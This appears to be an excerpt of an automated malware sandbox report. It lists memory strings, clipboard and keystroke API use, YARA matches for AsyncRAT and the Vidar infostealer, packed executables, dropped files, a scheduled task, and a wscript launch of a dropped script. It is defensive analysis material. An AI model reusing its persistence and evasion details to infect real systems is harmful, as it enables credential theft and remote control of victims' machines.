Source: chrome.exe, 0000002E.00000002.3227797865.00002AD80001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000002E.00000003.3159507075.00002AD8014E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000002E.00000003.3159556397.00002AD8014EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3240967783.00002AD801490000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159717285.00002AD8014F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159507075.00002AD8014E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228172316.00002AD800104000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.49JL8PttH04.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.avVfaMsGWq0.L.W.O/m=qmd
Source: LCESjzR.exe, 0000001D.00000003.2904530156.0000000003680000.00000004.00001000.00020000.00000000.sdmp, LCESjzR.exe, 0000001D.00000003.2905998366.000000007F1FB000.00000004.00001000.00020000.00000000.sdmp, LCESjzR.tmp, 0000001E.00000000.2909770413.0000000000921000.00000020.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.innosetup.com/
Source: LCESjzR.exe, 0000001D.00000003.2904530156.0000000003680000.00000004.00001000.00020000.00000000.sdmp, LCESjzR.exe, 0000001D.00000003.2905998366.000000007F1FB000.00000004.00001000.00020000.00000000.sdmp, LCESjzR.tmp, 0000001E.00000000.2909770413.0000000000921000.00000020.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.remobjects.com/ps
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 11_2_004050F9
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 28_2_0099F7C7
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 28_2_0099F55C
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 11_2_004044D1
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009B9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 28_2_009B9FD2

System Summary

Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.2.ugdKEDU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.2.ugdKEDU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name:
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: .idata
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: 4db43293bc.exe.10.dr Static PE information: section name:
Source: 4db43293bc.exe.10.dr Static PE information: section name: .idata
Source: 4db43293bc.exe.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: b191a8c87b.exe.10.dr Static PE information: section name:
Source: b191a8c87b.exe.10.dr Static PE information: section name: .idata
Source: b191a8c87b.exe.10.dr Static PE information: section name:
Source: random[1].exe1.10.dr Static PE information: section name:
Source: random[1].exe1.10.dr Static PE information: section name: .idata
Source: random[1].exe1.10.dr Static PE information: section name:
Source: 8fb472f3d3.exe.10.dr Static PE information: section name:
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: .idata
Source: 8fb472f3d3.exe.10.dr Static PE information: section name:
Source: random[2].exe.10.dr Static PE information: section name:
Source: random[2].exe.10.dr Static PE information: section name: .idata
Source: random[2].exe.10.dr Static PE information: section name:
Source: 0269e2f5f3.exe.10.dr Static PE information: section name:
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: .idata
Source: 0269e2f5f3.exe.10.dr Static PE information: section name:
Source: random[1].exe2.10.dr Static PE information: section name:
Source: random[1].exe2.10.dr Static PE information: section name: .idata
Source: random[1].exe2.10.dr Static PE information: section name:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Jump to dropped file
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00994763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 28_2_00994763
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00981B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 28_2_00981B4D
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 11_2_004038AF
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 28_2_0098F20D
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe File created: C:\Windows\SchedulesAb
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe File created: C:\Windows\ContainsBefore
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe File created: C:\Windows\TokenDetroit
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe File created: C:\Windows\AttacksContacted
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe File created: C:\Windows\HolyChrysler
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_0099E530 10_2_0099E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D78BB 10_2_009D78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D7049 10_2_009D7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D8860 10_2_009D8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D31A8 10_2_009D31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00994DE0 10_2_00994DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D2D10 10_2_009D2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D779B 10_2_009D779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00994B30 10_2_00994B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009C7F36 10_2_009C7F36
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_0040737E 11_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406EFE 11_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004079A2 11_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004049A8 11_2_004049A8
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00948017 28_2_00948017
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0092E1F0 28_2_0092E1F0
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0093E144 28_2_0093E144
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009222AD 28_2_009222AD
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0095A26E 28_2_0095A26E
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0093C624 28_2_0093C624
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009AC8A4 28_2_009AC8A4
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0095E87F 28_2_0095E87F
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00956ADE 28_2_00956ADE
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00992A05 28_2_00992A05
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00988BFF 28_2_00988BFF
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0093CD7A 28_2_0093CD7A
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0094CE10 28_2_0094CE10
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00957159 28_2_00957159
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00929240 28_2_00929240
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009B5311 28_2_009B5311
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009296E0 28_2_009296E0
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00941704 28_2_00941704
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00947B8B 28_2_00947B8B
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00929B60 28_2_00929B60
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00947DBA 28_2_00947DBA
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02A41F0F 31_2_02A41F0F
Source: Joe Sandbox View Dropped File: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: String function: 00940DA0 appears 46 times
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: String function: 0093FD52 appears 40 times
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1548 -ip 1548
Source: LCESjzR.tmp.29.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: LCESjzR.exe.10.dr Static PE information: Number of sections : 11 > 10
Source: LCESjzR[1].exe.10.dr Static PE information: Number of sections : 11 > 10
Source: LCESjzR.tmp.29.dr Static PE information: Number of sections : 11 > 10
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 34.2.ugdKEDU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 34.2.ugdKEDU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: Section: ZLIB complexity 0.9982171747275205
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: Section: hxbwlokj ZLIB complexity 0.9944489821858994
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9982171747275205
Source: skotes.exe.3.dr Static PE information: Section: hxbwlokj ZLIB complexity 0.9944489821858994
Source: 4db43293bc.exe.10.dr Static PE information: Section: ZLIB complexity 0.9972219856948229
Source: 4db43293bc.exe.10.dr Static PE information: Section: ooydwvsw ZLIB complexity 0.9942503576471462
Source: tYrnx75[1].exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: tYrnx75.exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[1].exe0.10.dr Static PE information: Section: nmmtmocg ZLIB complexity 0.9903322292209673
Source: b191a8c87b.exe.10.dr Static PE information: Section: nmmtmocg ZLIB complexity 0.9903322292209673
Source: random[1].exe1.10.dr Static PE information: Section: ZLIB complexity 0.9987815366972477
Source: random[1].exe1.10.dr Static PE information: Section: jttzozln ZLIB complexity 0.9940163297420451
Source: 8fb472f3d3.exe.10.dr Static PE information: Section: ZLIB complexity 0.9987815366972477
Source: 8fb472f3d3.exe.10.dr Static PE information: Section: jttzozln ZLIB complexity 0.9940163297420451
Source: random[2].exe.10.dr Static PE information: Section: pddznxyl ZLIB complexity 0.9944520356547438
Source: 0269e2f5f3.exe.10.dr Static PE information: Section: pddznxyl ZLIB complexity 0.9944520356547438
Source: ugdKEDU[1].exe.10.dr Static PE information: Section: .bsS ZLIB complexity 0.9972399855212355
Source: ugdKEDU.exe.10.dr Static PE information: Section: .bsS ZLIB complexity 0.9972399855212355
Source: jrgXmS0[1].exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: jrgXmS0.exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[1].exe2.10.dr Static PE information: Section: ZLIB complexity 0.9972219856948229
Source: random[1].exe2.10.dr Static PE information: Section: ooydwvsw ZLIB complexity 0.9942503576471462
Source: b191a8c87b.exe.10.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.10.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: ugdKEDU[1].exe.10.dr, WS36uhldRk15BMqR9l.cs Cryptographic APIs: 'CreateDecryptor'
Source: ugdKEDU.exe.10.dr, WS36uhldRk15BMqR9l.cs Cryptographic APIs: 'CreateDecryptor'
